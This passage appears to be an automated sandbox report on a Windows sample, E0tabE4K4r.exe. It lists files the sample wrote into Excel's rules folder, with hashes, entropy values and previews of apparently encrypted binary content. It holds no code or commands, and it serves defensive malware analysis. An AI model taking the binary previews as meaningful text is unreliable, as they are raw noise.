                                                                                                                                                  Preview:{ "Me......#eD.>...6._......S...c...2n.9'....Y(*p.......*..9.M>.e>5Vg....kR"b.0_.....T`#......=..i.5-..)_.[2.q$..H..8.2...t..d..O!....u......SZ...q.?Ake.@...._..*.R".Gi.M.^g^(M..`g|.GU.m$.C{...Q..s....>H.K..X.....z...L.G.$j...F..%.0.z.K@#P.r..Ka..nBx.q.{`...N.....&..0.yil@...b2g.2U..*....9Tkh....Y..........H^...6.7.,....b...x..:N....;..).R.,...`K....`....1..kJ1#...mV...6.....XR..W\.A...%.)<....d.x....h.xx.oK.P...'1.&8].......*m....d3.."......[C."......5!_I5....&..x{......3.TB.R.8...MAbJ8.H.j..../O_....]..h..."K....E.{yf;._7.......].:S..<.xKs?..R..|..........>...3.....Z.....M; S8..?j......T6..s%.rh..H.O....F.YmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1062891
                                                                                                                                                  Entropy (8bit):5.53011511803427
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:lFklFcwfMZJMyXSZlV0N8x5thr291gess3TylunX8:lOYaMZA
                                                                                                                                                  MD5:4CE43BED65D4A29C63AAFF0116EFA687
                                                                                                                                                  SHA1:F714E181310FC1B0B4375E6209379F3688C62461
                                                                                                                                                  SHA-256:707D22E15A865E79FD5EBE0DE7ACFD79C44D1ACCB77A0888F8C3D08F24D8AB97
                                                                                                                                                  SHA-512:2C1FE4AE8D63EB4C5089C2D5EC2354590BDAC2D1B869432AC055DEB9EA70F5A66CB0ECACAAE6CE73EFF97108AB8B5B07BBB83FCB613878FCE180868516934075
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<Rule.\......iw...-.`.e. .....=.|$uN....!.S.}..........)On:7.a..9.8<...R.J..S.K..d...Cm..-<.w.8..O................x..X..3.gO.KE@.0.....u.\3..>V...9.Y...g.MsZ......%TW....8j.V.5$..._mv4K....s&.\c...|......\..6..\9....6...a..... ....U%.,.. .y}....*R.-5a.....9....6.......vm}.G..Km|lL....l..^.H.%.RE...N..6......\k..@V.h..@....\d...=1g.;+....?.1juQ.W.'1.o].wh>43&+.z..".....5,.........`Q.......p.-..\....>r....{.7...v.Yn..U....Gg.w..I.....RA..@..O.rD..2..H.~.G...n..s.....|4..?..}...dyB.c......@..H...F..iu.U6..{..h..'....P...G..u.............."..%iq...(....<.,@P.^].<..P.8.....b..L]..!.......LF.j@.j.....:..&..bbYM.Yv^r.(....9OX......}..z...,..99V.B.B-...a......~U.jy..`....,..Rk8.D.....p.'.V...6..yVuDS.U.;.d.~..9.9..>C$.4P.Eo.!F..|..;Z..u...D..>.xfZ..1....&.$O..R.......OY.../.t.....d.}....X.K......H.8{.H..zB&h...$.t8.......&....'...*.;G..-#..U..U.W.2.......l.. qw...4..w......K.>!P...6.Z.E..x'.|J.....5.!...d^..]..2Y..*..[.....;.8...E.).J.E.A...Yk..[.g|...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11210v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1311
                                                                                                                                                  Entropy (8bit):7.846511383124682
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:05QucyoW6Qn9tVz3AXrMh2B/X3bWyRFFHYiIC8qCq3xxraEJ1dWqXPVemj2bD:cqyoh0FwXwh0WyPlIqnJ18aeLD
                                                                                                                                                  MD5:A3F14E0A5B861F2EDA29107234693489
                                                                                                                                                  SHA1:8A841CBAB3D3C0D0861D42F45BB2E32B605D2998
                                                                                                                                                  SHA-256:626AFF6ADDAAF75E967C61ACCB790AAFB683766C03B1070C453D6200E6F7237D
                                                                                                                                                  SHA-512:D3F3B6B4E45AFF03B1F767307BA85F33B3306042FB5EA1AA404647BBA47B5849C77A85691A1B28F1AAD954E14FBEFD7F381AEF952B0BA43660A2FA210ABD3C3D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...j.(/..^.A.....G8:..0.....v0.s[.....S..C+.%...d.........m..}.^].2V...\.K.>~...!?....q....._...r.,..lt..g+..'..yBj.$.s..$..`.Q.h.gf.......j....1...h_.9....-.H.%+.w.bP..r...l."2>!..O......)#.N\..4G......(.....0........KLu..8..jk.....{..6.o.Z.[.J.K.$:a>.yM+g.ZT.%......8...`.2K...&$.)..6".;>...A%(T...'.5.w.....P.C..X 1.n....~#...I.k,L3.%...z.w.&.!g<..._,.A.$+Y..|.P....X.!)&Y...T.f`x..I.=.%P..~.x]..B.....v..".).0H.......'.IT..9....>...zS..E...../.C..1../...p.#...Rk..K|/..c.UA.;.i!........E.....S;....=.:..w....E.X.f.*.QQ..zA.|z.....2.....9....G{0uj..0..yw.Ao.O.8.2Y.9aG...)......{.f.....,..;...p..u~.H...+.....0. .T.DFq..8....+w.?...w...N#..=X.!.......%.B..L8.....!6.&..d.7.4T..J.bG..pKyL9'...?........Q.WpJ..n....... ''r..#NtB30mO-...w..V3.)...-.N..y./....=T..R0..a......).jk..X.JO..TQG&.../B..m:C... .G..$d.......o....2.R~.w......I....s:..G~........)..T.{.(.qZ......]..sl...)..=;/E"....V.E.(e}.-[...{..S..<.!..........i....LS...C...`@K].2..A.^.C.....M..2

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11264v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3172
                                                                                                                                                  Entropy (8bit):7.942444699426459
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:OF+8we96Y4Aw0/lVPbeQ15HDRtBEdTwilj/7F69vFdOUj4H5UwKLI7lA/CBk0/4o:4Hwe96YhQQT67edsZjKLIiCBk0/f
                                                                                                                                                  MD5:7F35BAE68A1F01569E0F5106B052D83A
                                                                                                                                                  SHA1:D142092EC54828517BEABE4E9EB87BF23FA84502
                                                                                                                                                  SHA-256:991E86B67086266A59D2A9B67C0FE48928EB50ACE6C215414FA63E4D3987AEBB
                                                                                                                                                  SHA-512:6F31B0767220338CF20954DF8506C0219CB3BF26758B714D9A798E07F83C0F117CEDF9557CCDCAD78085B55FE691379D4B635B140F65E10671472B6239DC596D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml1^?..<+.i...W....).......$j........n.To...q)],...l.[.......y#......K...;G..j. T.^r.i...3Yo.. .3...#.............fG...+..._.B......K*.........|...z.E.6...}.5....j.!.......90F`*.....".w..1dr.fP3...QB.r..r}.Z..........Q...GP..*....Uu.".......=../p..&.m.*....Rw....md..}..8...Z#D.P.HR....h[.......(..[...%:Cxt.0v.a.....(Z$..T.......+...d......W...*.(.p.g...g....q..4x"....3;..kwGF"8x....8.u*f.C...$..I.M.R.}.*...r......!.....Y`.V.@y.t...[...1.....?..:`R...+d.L.p...WgK..r...n.....$.....E..21..,a*.8....d....n..3...i.S._.0<S|..oJ..-P.....YNuC...x...MBe.r!.....=..O....i... Tk/....[..t#..NYs...<.....T.[.Y....y.........o...3.y4.....D....d....B.xw..NR...$..1to...............N+7....B..K..-."~!]....5.VM9..8..+.....]..9."v.w.N?^.]....P.<...F..y..U..V..|..[.LK..|A..Z.3`... ...n.Ps.......v5.6.....%_@Ux@w.;d&...W.J.....D....Z7...g....W..>js.k(V....RCh.ogv.i..D....b..F..}.....%&UX....}Q$..^...&....S....^.;..).TI......W...7].....]>.&L...-Rs..:.vm

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11265v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2096
                                                                                                                                                  Entropy (8bit):7.909459616443874
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:isONiI/o7PcApZ+xbHHDVD0NjBDxVC0tPdQmsVZvID:isONiIwDcAP+dHHhD21Ga0O
                                                                                                                                                  MD5:C606416FE158B704198EACCCA7986F71
                                                                                                                                                  SHA1:0BA3385EAEA0EF0EDFB11929B0AC6371F3DBB473
                                                                                                                                                  SHA-256:3CEA0466ED714DA262FE8AC7155197C206D5398CD0567E0D654CBD49897EA99D
                                                                                                                                                  SHA-512:B138F2632ECA3B64CDFCFD1DD4D63883FF7C4535C8C8C5212A3F1A10F04062F0380D28AA1ECD5B521588FD007B81781616C222F203ECD95B071E2D210E080958
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.../...tx.N.`.O........u+..?F.@.e....x....&...Q^r_.......Cn.H....$/&s....>..K."..OS..N.H.-.:..s).s..'KHm.'.2X.~F..ZQ..]..n.....}..HTZ.Vk......Y..4......%m5k ..\....4..+....o...t...!&..T.....yV.].....l9.M.z......?.o..5.y.......A.t.zV. k{<.mr@..N....(.d.<.-.U7[h..8..V.O..|U....b..qmWC. ..B.A./..%..{R.a.a.........vY+.-.#U.H.>.1...f..w.......E.#...@.qE+...oA.U..`.c.i*.....j.fq.N...5....&.%...B.-^...k.".M+.E..\.r.3......q ...oK.l.o.e|..3g.....~.].\i..E.+.%h...........b...F.........y..Qpx..@{J..5Q..@....0..4.2...r...c.&.h..K...3n.bRv.7+.....,G...f5..U.K5+..........b...q........ts..... J..%.WI?.._...k.O..g.mn..7H#.!?.....P..w..-.*!...t...mg. F7b=qO...#o.......:..@.\..$u.NV.r.6..)......d...q..=......YAX-]...p+...."..Q?.~.z=.....-....3..u+....&.v.Jt53J... ...Jz.=\..6+wb...3..F]7.$...I.;&u.m.@xa.hZ..BY...oP.*....4.......:'....SF.......@\@.x../v.#....U.*..}}..D..Rf..Nt.'W&.]!..T...0.=y.M%&E.M.*...y..s...oI..3.s.kw1......4....M.U(RZ../..4...09..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11285v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7525
                                                                                                                                                  Entropy (8bit):7.976965989469556
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:YnKqjmjOguAfNa9adH6YSIHm3hw0Z3jcTYL3Sa1rzOU:2IOHUxuIG/dZRx
                                                                                                                                                  MD5:5193FD26A4E9BB045CE3D0B4C0CC6308
                                                                                                                                                  SHA1:2129F19ADDEEE028100B7FB3E57A9C9FBAA6441D
                                                                                                                                                  SHA-256:27C0EB8525AE4A361B72A72C3B05BDE11B0CEFBB0AF321A1B7E756CC949C9DA9
                                                                                                                                                  SHA-512:279C0A05641117099E0FCAF261C2BB257067C0A3D23D6A108CB49E43609C9F3E17EC624F1434BCCDE59BA8B6351A20DBBC07AFD13757B8F26BC8C2B97FEBDD43
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.#.0S...?..h.. .L..p../>4.B.I ..B*....tb.(..).+d?.....yo....j..P.aP..t.!5......g..5_..q.T.t.<@.yp.dF...G.8..2ZxED.v...^.V={`._.4...X. &P53TJC.JU...c..n..t_$.AFtB..n...ACa_k...3...S....:...f.x..I.L... .i...`..b...??.l.....>.....Ny.....S...@.0.aEl.r#..S.....7&.0$hXZN.-..........\.QCI..Y......w........w..f.H+..../.l3..lD."x.z|F.......du.......X.!...l-.r....X.E*. ..%..L,..f...5.jg..0...(=....xM.c.f........L#.C$....w..v>.9<]..$9..JV.........!.ww..X.Bdf:.....S..0.D.b]@....N....U..V..9.g0....R.6..?.......s`.}.^.....s.z....A...$.MI..X.(?....B.T{d..*..'z.4..C.AC...53xC.../#,4_.sZl{I.....Y.;..}.&Jvd.7y1..W@.....R.n..9...r.MZ...=xb......o..D.:..H..?..Y...<.9#.<.Y...........s..6.....A..XZ..)A.....u_1rs..#A.....y\.... .j8...a.{.h2fKF.."..M........6.D#.fN=.....z..&y....8.z1.Ctj......I...7..uO.......U..T...?\.5...G>Z....e:.X.....=.\Z;...%.>.<..d.axA.7$.u.7e.=.x4&.K4.R...a...|..#.)......j.!.x....:..W..(.......{.'....!..A.a;.E5R.....{s.7.p.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11289v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4197
                                                                                                                                                  Entropy (8bit):7.957880892064677
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:e1NmGhkk8bMNcXrdA2VQEQd/VKGIt4fF2GivlZRTTNQ3oj8wW5HRB:Cfhkk8bgcXxAjEodKGIt4t2GwR363LwM
                                                                                                                                                  MD5:69198EB0B799D61FF56A751E563F274D
                                                                                                                                                  SHA1:E8057E1AFC5D43781210708CC90E4D58B4FF1BB7
                                                                                                                                                  SHA-256:CB4274168AC8B8FBA5377A54C2E3399E32E3DF6B2157714147C5AF8E817650CC
                                                                                                                                                  SHA-512:32D93F90FC2B6A2894436F3BEB0BCA8EB78131E9FE16B02FE7B12DDB8D0C9445F926FA160A507D97AEB388780884DE93B07557A34E3FBA6D1D54466C6D7F29FC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.{P.....E>%..s..%.Vn.G"..&P1......Uu..a..f&.i?.....(...R....<..*.Sx..I...1.x.6]8..{.~.A..|(\.$..BT.r9,..w./..S.M.......?......9...os.El..../..V.....'."j3..=.(Q].....m...m\0...e........e\.!.hx.n...[R.-.z...r...H..........H.....=....n......`r.)u....'..........^.{....c S.v4s.....F.C...$t_...n..$..x.d.\R...Mg.9..l......9.../.?....~...:...6M...?./...=..;..R4..4..f.A.G._DcL..s....t.v..Q...!...JA....Rf..F.S.s)...y.x..>F.5lAk9e{......=M.\...Q.W.9}.+.F.o?f..]....=.f.......s.....;C.....-.X....i.8..I..E...........Ib....C..q..&..........ye.V...[.!..\.g....X..uh0K.q02.g..?.....[3....Ku.j...%......n..~...1.*.iW....J...!z... ..W....Ma..8$...s..M.f......d.Oi...-.?..._..p.YAl.:.S%..D..T....b~4W....+..(....*..[.,...%{.y.=.@.........0..\#,.o.y....3.....}..0[@.C.<..f..5.VP .,s8P.....U....h..$_.4.."G3..'.+....L.z....t...oq.t....d.C..$2.]yv...O.g.0.I.2.......K..-..L;.L..S..%c..)........?...~>8.G.U....)Xl.........Q\!.a...@S.....J.Un..N.....9.W...A

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11300v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4608
                                                                                                                                                  Entropy (8bit):7.961805460684089
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:Zg+NoJTRiYObeM2Hd3cD8Id6g7ezBbEj3u8jIsmmsmuB54:KG+USd3cD8IdjeFe5Tmmsrv4
                                                                                                                                                  MD5:9222D5CCF85A943DA933341B2F1E506D
                                                                                                                                                  SHA1:F600753B2C02B549237DFAB9F56576BF645B5D83
                                                                                                                                                  SHA-256:67135F73B518E67EDABBB25D435718975D50E7F1F32B2C233C386D662E08BF4B
                                                                                                                                                  SHA-512:02B7F93A467779973080D28EC4DB32F72EB063433B5170814028E237B33927FE4F590EAF2102505D59A20886E3597923393BBB0DAD691D280EE9A2CC0D13FAB7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.v.H....R...s5I...|.."...@.......^.z.......E:,...?.>.Hn).F.o=.y.Diy..|.QU,.}._&...i.j....n....0...t...,.|...o.v........Y..%..w/....Y&.kB;..:M..Qb..I._......Yd\cQ...J...F\...M.. .6...f......2..~.Hj.M6..T....:vuk..!..B....c...n(v....b"&j.*...N\....\.CS.e.m#.. ..G.7'(...CBv.J'..........1._.1...5...42..N...a...H.}1.....xL.Y^$..?}-...j....v.A....@.....6.O.Z........G..D&....w....[[.#.cSyC.'.....h.m.......\...H.!."t...-S.=..%{......nA..W.K....|9.y4W....p.......;.`.n#.i.`.A.DA.TAK....&..U..9T.....?.....4.3..2r..}...J.....8.....a.E?............:.fb....lG.*l...v.0..3.n.p.?...........2........^.cc....{..XJs..G_.....4.0...of..../..j@...^s......../..X.{_.\D....c._....Z..;....p.y....L..oy6tWg/4.h.*.l.pp..j.7.3.9....}ju.7(*e3.J...-.~D.....4 -x6.3...V!(...^K5O..I/U.T..}..m...[....F...YW.b.....*`<..[.@....v.-M2.Q....>.5q`.,.c..N..>\.................]!Qh*.N.Me.(...8...:..*.t....F.........fT..2...,Q.}\a.6c.[..l...L.em......{..8.)...,DIE3.....n.......,~.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11302v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2884
                                                                                                                                                  Entropy (8bit):7.936853266693646
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:lFvKYys71NTPzO+zv5bG4KD/nq3A0Q+Wym4f3jXZva7YvnkwyLNmwCgjGD:2Yys715PJbvKD/qVWym4fU0vkH/g
                                                                                                                                                  MD5:3AD92EB915D583762DBA4513E9BC60E3
                                                                                                                                                  SHA1:CF9B8F7BEEADE2D269E4FE5930346E5A20D0BF53
                                                                                                                                                  SHA-256:C9DF66CDFFB3AA88EFA1AFECDEA894A70131AE7110DDBA51E7D5B787F5B90E5B
                                                                                                                                                  SHA-512:34ADB117BE56F7E25787C80EC2EEA71A6ADBC951235C205B61E9A8CE002675C3402387AB4AAF83AFDF66A4F607197C724E660DD2F0E41FC320B098808B7B583E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.e&00.@^ ..../0.... V.W.b.....~...a......y.K.*..WT ..-X.pL.....ain....>..,.K.......C.k...Z..`.....P.$.s....i2.....A.,:F.C.....@..C./.(.R.e...^...V..%.....O.B.!"u..h...l...../....P...v?Xb..":?...n.....[.a.."..R1...wW0..$..c?..Z3...N.!..UN.:.} X...|$.[g......R.#...._./.T.U..:..;m.....4...JY..!....'....h...(.Y.3!...c.K.0.._.6.g!W..}y.Z....k#k...xP...].>t.......>!..g....d......(.......e.P.Z.!...Z^.....Y.d......s%....rz[..K9...M*.L>.......V.......2,.?..oa...lMqF..d..{..0...Y1.n:].......i...-!..%....f.@0_m.......N..VY-4...%...D...v..1.. .T....\l..+...m..c.............]e......".c.\.L.$ak...mH.. ,8...)^...P..[.`... .*. ...*.t...^.H.y...w....H5T9...J.....)...p...P`....g.....].....".#I.q.g3.O... ........w.C9..c.5.og"6..(pt..j.6.8Z..+..?...R.....'..'.....8z`...DE...%......X..lT....]G%.I!..{..Qy.Z...7.3.:9.QA.."...jl.yB9.p.W/.......e..!.1.I8D..3t7nhf>M..?...2..i..I.o..wX..a.7....}.....2.p.....O.F....(V..^i....TnA.h.0..V...O..#.Z1!S..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11362v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5842
                                                                                                                                                  Entropy (8bit):7.968864389762353
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:7FXN/T7YbuZjknA3FuBoJSxBIh9F7J+wobxabOlj1Tk7jaIBLDZjhi:77jjuESA79+wEaKljFkbLFjg
                                                                                                                                                  MD5:F4741D86A9A0037CBDF59A93F31FFF25
                                                                                                                                                  SHA1:8D52444A271BB136EBEA5B95A60985C8C2FA6B3D
                                                                                                                                                  SHA-256:DF5B7902765975C851C9385F9A2CC0DA4152B832DE26752B543EBCE3ED6E1054
                                                                                                                                                  SHA-512:C29F6E67E3862B12E2291F41FC166F7CDDC1719EEC0C109A58C920D53C7034F81EC9B3B4A859D72C5CCC6B9EE25776AE029C3BC675E0B3313D56CBD42E505600
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....1...:....3.*.dy7...c..^[..Kw..`.s.e{.3.^+"....m."mp.2$.;?..H.2.............Q..Z......3..\.".|....-a..=7.]...]..3..9`.A.8...C7M..N%..'.1<4rJf.t..E..N..w..X..t....!.b..@.....m.....$j#.$..Q.+."..)....2j.Z.'.y...".e]...{......a..D.M.!T......j.....p-.d.*T.?!E^.`.......R...C@..g.V...X.:......'.....Q.$...Q....6.h..K>.M#.....4..kk.....V...g*L;..<......^...W......4.'........?..f$.l....h&s....:..-.}..)_./hI...*...v.*.#Gp.tT..hi..[.wQ.tl...eD..O.&.*?~hV....._k..qxd..}x^.u..R"..6\.ON.9...=....>?.jC.oG...=..ad9.!..P.5.o...HCE../.RX5M....>..'.Ws..Bn.*.._.X.!.q......gji...u..vr,6s.........PT........!.]....wv.....M.x....B`.q...<&_...#.........^'.......b|O:vw......Dum6..I1...+TW)..Z.3.....T1,BYP.D...C..$...q..%.D...h.}.a"7......Sn^.FO....V#R<b..li....D..\-...R...E.6............n".....6..-....."^.b4........w..|.....a.......&.i8F.j8.v3..Mm.2:.l.=....,*...._C.....,}.yV..I}V.d............sh....D|E.....v.JY.BJ?..@...y\~t.&..u....m0G ...&L..?.b

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11369v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2023
                                                                                                                                                  Entropy (8bit):7.9142993259589165
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:3mrbLL9iFhwfbW5XwuBVXAAabbKioJ78YN2LCGbh+m+yfcfD:Wrb3ahwfbIXfXA9omYN2LCwhFDcL
                                                                                                                                                  MD5:5E0303D0171DB0F6662460EA7A575AFF
                                                                                                                                                  SHA1:D832A7C3C251009289471394FCEA19245696D67E
                                                                                                                                                  SHA-256:F58566AC0EEF8EB4DEC9A36DB94BA02AEFB97B387D1B096853991AA7A86B4965
                                                                                                                                                  SHA-512:ABBEFFDBB95315E13F99593E92A1BCAA6F6F8F8213F0BD88D4797907B42484D4B92AB930EBFE64511B14C5AD10F4E9BE15B97D2917F0BDFF02EE112E172EE2E7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlpJ..Q.@m.....S/..v......#...+....H.$..).c........,Dcr.4}.P.....p."4.......@|.........%.'w.i.<.../7.............Q..>.frM..M...LOO..0_.1...14<,v..XoG..H.....c..}.|....hf.@...6p....a1.......$ E....Bf..scw2:.M.$......z6.-..`.....G....n.BfN...........6K.>...L3..Kg....:........\!\.1.it.:.Cf%.....n<Z..]mY/..'..<..j...x.....RO...y.y..<..O.l.x..D.Z.!\.......Y.$....`.M.S..k..z/'B#.V..g....._..}.'.~F...5...o&B2....h<`L.AC.i.%M......0.p..l..31.S..U.w..'.......y.Z.x..!.ik...C[.q...G..&...g....Z! .9.}...T..~:....!...{....S...t..R..e.3b..XW|..DgE..:..'X........p.....5...m.g.d./. q..[..!.L..#h..)'...Y..a..7E...u._.:..E.s.<....a....i.....ab4!......B....}.Y..>A.W]....v/.....k..s(._..l..e..~^$......peG.B9e.u.|...>:.......2I5.#.....!.....T.RZ...t.;...a.u.Z..u".92&X[...,=.&h.....ox.)}...W.B''...'...S.p.og3....).....*.kP2.... U$S.T...}...o.....&v.q.....Q.w..r..4..) (u..{.\4...O{LM5..0.....gm)...`....}............9.^...!..\...l......T..@..#...~.B..;

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11370v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1001
                                                                                                                                                  Entropy (8bit):7.7856193858896106
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:QMT59EkEBegy6slUzKz2YtVxUI4AtT2bD:QMN9ElBSJunY9UIviD
                                                                                                                                                  MD5:EFB094379A43253FEE1142466215F57A
                                                                                                                                                  SHA1:7A80D8DFD0C4CF6130207E0F5229C0F9EEFAD488
                                                                                                                                                  SHA-256:C3303279B5A4502F0C062A92303460086AC420B22CE60D7DBDF821C62CBE9A7C
                                                                                                                                                  SHA-512:4D1B29A5398AC687014A2C5B27A394840CD8A9A7D55679672B2F9BAA16D56BC6ED79E4E87174D75F9B7B71BBD323646C5095C8486A4443252B0C5607219F141F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml-HN........V..W.P...A.........).7].>......W.r.lT.?.f.N.......t-J..l1....>....'.>z6...<5..@..{..&%}......@-@u.[pA.....[P.....<k0.H........KGU.d7.....nc....l.a.K.8....$N?.tg......".r.....w...j/..Ic.~...-.[.A. .....[S..}...`..7e..yF`..T..8.2.wc.DB..z(.HS...4.........r.<.[.m...../..z.....B%..~...&.r.H.....uS../5..P.'.a&kY]..9.>..va8...:...F.JzG..#..2....[R....K..X......0o..R..+..e.q.,.....^$".3..A#M.w<|.w..%....3...#X...}.......F.P.T...>0B.....0......2..6T..=?NFI.h.........#.......i&';../8.A....]..n#...*{?Z.CCv*..e...K..6+".C..O......A...al..C....;...a....(.;.....N~\...".J.kq..60......E....M.+..N.)D~%jg...e..t.$..n.....W]9.pN..#wp.O+5.oR...IC.R.Y.C...v1.c..z..<.+.....'DL....>J.l..s2.On..H.9...w.GX$.......w.X.=qh..>.A....Q.D.}8'.+^..B.B.w/.Gp.g..4.2%..<s/.^..ad.od%n.q.;.M._.....JzS..R...tL.+.%..~...^P..R5.I.XL."..`....1&.....q..$Q.....0.......(..g..`....N^..... Q.&.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11381v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2743
                                                                                                                                                  Entropy (8bit):7.9230924659208055
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:uaL4UArSi/lP47pUfFgHwIZ2xfPkwf7fewcFMDDhoKRElqZVpy+2pclD:UfPWUtEwIqHcFMDDiW9O+N
                                                                                                                                                  MD5:030D474DADA9BD5A56EEE7230FD1141D
                                                                                                                                                  SHA1:A308C6D13088BFA530CDF7BE5ECB3A351E905563
                                                                                                                                                  SHA-256:765E86ABA840ED5358A0AB53AE79E578CB2274B027BB43DBFED4B7F5D81C965A
                                                                                                                                                  SHA-512:B212D60B1AE1A8226614A96C2EA68EACB34F8AADC2BE494782A942A51EF250C13F468B26840693F29C3A3DBB7734B5D0729B0E329DB87C7D191C27B12CC16A5E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..}[.Y..R.&.8O.....o' T..-..n....!k..9..x}0me.`..^.oY_..X.....&+pk............x....Pk~c..... .8aI1...:PF..i.4.O...l.a%j.X.>.u.F.h>.4.Cq...........}....#T.WV<.E.....S{.....Q.~..;=.IO..p.".2V.%..... .."...u...G..tj=..ZT.`'S.s.%Ul.|..8v^.6..n}.~...W....-.#.$X.px'.@.K......pI..jWn.pB.:.h....w......R.....)l!zN.!'V..i.9.&....]T'...i...~.._.C....k.L...k..3.!..^w.+..`.X....+....o.4..+:46..S.X....}t.^=Y^.!......-..u.............#..l...S....2....t.k)..pZoy...j.f~4.b....P..-..j........u..I.:...w!.B.....+.9....>.=>......2..&rq.0.Dl.F..f.C\..p.C...'.)H...."l.U.l..b..t...........M%...cX|.......)....'..6.......S;.1.t.T..7(~......}.0.(K......+v..4...Q|Nr.?a.Vo...HM..8d....I..)#66..l@..e.d.C-!..7......0....'5.b.....Y.l......^.W..Dp..m.c....q#...-v...H.5.....p.J.Y..v.%...+.....:..7..H..s.......H...%.8.1.A.BC.B.K...........Xw..S..."........._".c.w.+..<....%>.Z\Q.*.;qr......1=.U.......l.......d.i...2V.>.b.f...~...JD.e...B.'0.7.X./zr.5w.2...c......\.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11446v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11063
